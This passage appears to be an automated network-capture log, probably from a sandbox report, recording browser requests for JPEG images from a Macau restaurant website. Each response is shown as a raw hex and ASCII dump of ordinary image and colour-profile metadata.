                                                                                                                                                              Mar 13, 2023 05:26:08.698577881 CET1141INData Raw: 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 65 63 2e 63 68 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii: www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Refere
                                                                                                                                                              Mar 13, 2023 05:26:08.698626041 CET1142INData Raw: 1c 21 48 21 75 21 a1 21 ce 21 fb 22 27 22 55 22 82 22 af 22 dd 23 0a 23 38 23 66 23 94 23 c2 23 f0 24 1f 24 4d 24 7c 24 ab 24 da 25 09 25 38 25 68 25 97 25 c7 25 f7 26 27 26 57 26 87 26 b7 26 e8 27 18 27 49 27 7a 27 ab 27 dc 28 0d 28 3f 28 71 28
                                                                                                                                                              Data Ascii: !H!u!!!"'"U"""##8#f###$$M$|$$%%8%h%%%&'&W&&&''I'z''((?(q(())8)k))**5*h**++6+i++,,9,n,,--A-v--..L.../$/Z///050l0011J1112*2c2233F3334+4e4455M555676r667$7`7788P8899B999
                                                                                                                                                              Mar 13, 2023 05:26:08.698810101 CET1143INData Raw: 0a 0b 11 15 0f 0c 0c 0f 15 18 13 13 15 13 13 18 11 0c 0c 0c 0c 0c 0c 11 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 0d 0b 0b 0d 0e 0d 10 0e 0e 10 14 0e 0e 0e 14 14 0e 0e 0e 0e 14 11 0c 0c 0c 0c 0c 11 11
                                                                                                                                                              Data Ascii: "?3!1AQa"q2
                                                                                                                                                              Mar 13, 2023 05:26:08.901448965 CET1204INData Raw: 20 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 47 72 6e 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 6c 20 20 64 6f 75 62 40 6f e0 00 00 00 00 00 00 00 00 00 42 72 64 54 55 6e 74 46 23 52 6c 74 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii: doub@oGrn doub@oBl doub@oBrdTUntF#RltBld UntF#RltRsltUntF#Pxl@RvectorDataboolPgPsenumPgPsPgPCLeftUntF#RltTop UntF#RltScl UntF#Prc@Y
                                                                                                                                                              Mar 13, 2023 05:26:08.901532888 CET1205INData Raw: 6c 6f 6e 67 00 00 00 00 00 00 00 00 4c 65 66 74 6c 6f 6e 67 00 00 00 00 00 00 00 00 42 74 6f 6d 6c 6f 6e 67 00 00 00 2b 00 00 00 00 52 67 68 74 6c 6f 6e 67 00 00 02 62 00 00 00 03 75 72 6c 54 45 58 54 00 00 00 01 00 00 00 00 00 00 6e 75 6c 6c 54
                                                                                                                                                              Data Ascii: longLeftlongBtomlong+RghtlongburlTEXTnullTEXTMsgeTEXTaltTagTEXTcellTextIsHTMLboolcellTextTEXThorzAlignenumESliceHorzAligndefaultvertAlignenumE
                                                                                                                                                              Mar 13, 2023 05:26:08.901662111 CET1207INData Raw: 00 00 00 00 00 00 00 00 00 00 00 2e 49 45 43 20 36 31 39 36 36 2d 32 2e 31 20 44 65 66 61 75 6c 74 20 52 47 42 20 63 6f 6c 6f 75 72 20 73 70 61 63 65 20 2d 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 65 73
                                                                                                                                                              Data Ascii: .IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1,Reference Viewing Condition in IEC61966-2.1view_.
                                                                                                                                                              Mar 13, 2023 05:26:08.901768923 CET1208INData Raw: 24 2f 5a 2f 91 2f c7 2f fe 30 35 30 6c 30 a4 30 db 31 12 31 4a 31 82 31 ba 31 f2 32 2a 32 63 32 9b 32 d4 33 0d 33 46 33 7f 33 b8 33 f1 34 2b 34 65 34 9e 34 d8 35 13 35 4d 35 87 35 c2 35 fd 36 37 36 72 36 ae 36 e9 37 24 37 60 37 9c 37 d7 38 14 38
                                                                                                                                                              Data Ascii: $/Z///050l0011J1112*2c2233F3334+4e4455M555676r667$7`7788P8899B999:6:t::;-;k;;<'<e<<="=a==> >`>>?!?a??@#@d@@A)AjAAB0BrBBC:C}CDDGDDEEUEEF"FgFFG5G{GHHKHHIIcIIJ7J}JKKSKKL*LrLM
                                                                                                                                                              Mar 13, 2023 05:26:08.901865959 CET1209INData Raw: 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 03 00 01 02 04 05 06 07 08 09 0a 0b 01 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 01 00 02 03 04 05 06 07 08 09 0a 0b 10 00 01 04 01 03 02 04 02 05 07 06 08 05 03 0c 33 01 00 02 11 03 04 21
                                                                                                                                                              Data Ascii: 3!1AQa"q2B#$Rb34rC%Scs5&DTdEt6UeuF'Vfv7GWgw5!1AQaq"2B#R3$brCS
                                                                                                                                                              Mar 13, 2023 05:26:09.138299942 CET1236OUTGET /images/menu01b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:09.343436003 CET1282INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1061
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "1eb317f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:14 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 28 03 01 11 00 02 11 01 03 11 01 ff c4 00 85 00 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 03 06 07 04 05 01 01 00 01 05 01 00 00 00 00 00 00 00 00 00 00 00 00 02 01 03 04 05 06 08 10 00 01 04 01 03 03 03 04 03 00 00 00 00 00 00 00 01 02 03 04 05 11 00 12 06 22 13 07 21 14 15 31 41 42 23 61 81 32 11 00 02 01 02 05 04 01 00 0b 01 00 00 00 00 00 00 01 02 11 00 03 21 31 12 13 04 51 61 22 05 41 f0 81 a1 b1 d1 32 42 62 23 33 15 16 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 df 77 eb cb 35 a0 a6 fd 29 4d fa 52 9b f4 a5 37 e9 4a d6 6c 1a e3 af 78 eb c6 e6 f2 d6 c6 b9 60 dc fb 74 c0 80 cc d0 b1 ee d3 b8 ac bb 32 2e dc 7a 63 01 59 fe 35 d5 df b7 c6 6f 5d c5 de 77 5f ec 8d 28 1f f5 7c cb a4 7d b5 92 40 d0 b2 7a fd 33 ab 47 91 a8 69 57 c9 fc 8d ca ef 4c d9 50 2a ac 2b 6b e2 56 c0 71 b8 ef 3a fc a8 81 7b dc 79 c6 a4 25 b4 25 2d 9f c1 59 27 1e 9a d8 fb de 0d 93 ca e5 72 6f 6a 2a ac 8a 15 48 52 4b 2c c9 62 18 00 00 e8 64 d4 ee a0 d4 cc 7b 57 88 ef 00 e2 70 53 77 6d 2e 55 b4 8a 38 dc 6a b7 91 d5 44 65 c6 1b 96 13 60 fa 19 11 df 5a 9a 52 32 0a 8f 5a 52 3d 30 ad a7 fc 9c 36 f4 7c 4b 7b 97 58 b9 b6 2d 25 d5 00 80 de 64 0d 2c 48 8f ac 0f dd 07 2a 86 d2 89 38 c4 03 52 3f c1 38 4b d2 93 57 5c f5 da 27 da 71 65 72 6a a9 12 5d 8c 5a 8f b6 21 92 98 cf 21 0c 85 3b 90 85 02 e2 4b 78 f4 e8 3f 5d 49 fd 2f 05 9f 6e d9 b9 a9 ac ee a9 25 61 7c 75 69 60 17 cb 23 e4 0a c6 1e 26 aa 6d 2e 42 72 9a 0f 1b 71 c8 b5 b5 8d da dc 22 15 8d 9d 08 b8 f9 87 6e 2b 18 61 97 9f 60 c8 8f 18 d6 ba 44 b7 02 86 d4 15 a5 43 a8 e4 27 68 d3 fe 7f 8c 96 d0 5c 78 66 b7 af 51 b9 6c 28 24 6a 55 da 3f c8 67 01 a8 1c ce 02 29 b2 a0 62 7e 27 31 f7 67 58 bc ab 9b 19 95 d5 75 52 64 77 20 53 77 fe 36 3e c4 0e df b8 58 71 de a0 90 a5 6e 50 cf 51 38 fb 6b 98 b9 c9 b9 72 da 5b 63 e2 93 a4 61 86 a3 27 be 7d 6a c1 62 40 1d 2a c0 3c 85 cb 3e 42 e2 c9 cb 26 e5 48 bf 0d 0b 96 64 c4 8b 22 34 9e c0 01 a2 e4 67 59 5b 24 a0 0f 43 b3 23 fb 3a ce ff 00 6b 97 b8 f7 0b 02 5e 35 4a ab 2b 46 52 a4 15 c3 e3 0a 96 eb 49 3d 6b 8a 57 33 e4 93 55 74 a9 56 8a 78 f2 18 ec c5 b5 0a 6d ac 2d 88 eb 43 8d 36 80 11 86 d2 85 36 9c 06 f6 e0 0c 7d 35 66 e7 b4 e4 dc 37 35 3c ee 00 1b 01 88 52 08 03 0f 10 20 46 98 aa 1b 8c 67 bd 11 cc b9 13 72 e3 4e 45 8e 25 43 ab f8 58 ee f6 59 e9 83 d9 53 1d 9c 14 60 fe b5 11 b8 8d df 7c e7 41 ec f9 21 c3 86 c4 26 81 80 fc 91 a6 32 e8 62 73 ef 4d 6d 33 da 2a 51 cd af cd 6b 15 2f bb 0a 7c 48 91 cc 58 8a 9d 5d 06 5b ec b2 73 fa da 91 21 87 1e 40 4e 4e d0 95 8d bf 8e 35 2f f5 79 1b 62 d9 2a ca 04 0d 48 8c 40 e8 19 94 b0 ed
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed("!1AB#a2!1Qa"A2Bb#3?w5)MR7Jlx`t2.zcY5o]w_(|}@z3GiWLP*+kVq:{y%%-Y'roj*HRK,bd{WpSwm.U8jDe`ZR2ZR=06|K{X-%d,H*8R?8KW\'qerj]Z!!;Kx?]I/n%a|ui`#&m.Brq"n+a`DC'h\xfQl($jU?g)b~'1gXuRdw Sw6>XqnPQ8kr[ca'}jb@*<>B&Hd"4gY[$C#:k^5J+FRI=kW3UtVxm-C66}5f75<R FgrNE%CXYS`|A!&2bsMm3*Qk/|HX][s!@NN5/yb*H@
                                                                                                                                                              Mar 13, 2023 05:26:09.350083113 CET1283OUTGET /images/indexpic02.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:10.918433905 CET1562INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 92859
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "02eb1f7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:15 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 22 64 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 a0 00 00 01 01 00 03 00 00 00 01 01 5e 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 38 20 31 31 3a 33 33 3a 35 31 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 a0 a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 20 de 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f 2f
                                                                                                                                                              Data Ascii: "dExifMM*^(12i ''Adobe Photoshop CS6 (Windows)2020:05:28 11:33:510221^nv(~ HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http://
                                                                                                                                                              Mar 13, 2023 05:26:13.148382902 CET2005OUTGET /images/indexpic04.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:13.354367018 CET2033INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 86879
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "1c7cbff7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:18 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 1f 8a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 a0 00 00 01 01 00 03 00 00 00 01 01 5e 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 38 20 31 31 3a 33 34 3a 32 33 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 a0 a0 03 00 04 00 00 00 01 00 00 01 5e 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 1e 04 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*^(12i ''Adobe Photoshop CS6 (Windows)2020:05:28 11:34:230221^nv(~HHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:15.654414892 CET2339OUTGET /images/menu05b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:15.859580040 CET2359INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 20342
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "5efe63f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:21 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 12 d0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 69 00 00 01 01 00 03 00 00 00 01 00 1c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 36 20 31 36 3a 33 36 3a 30 35 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 69 a0 03 00 04 00 00 00 01 00 00 00 1c 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 11 4a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 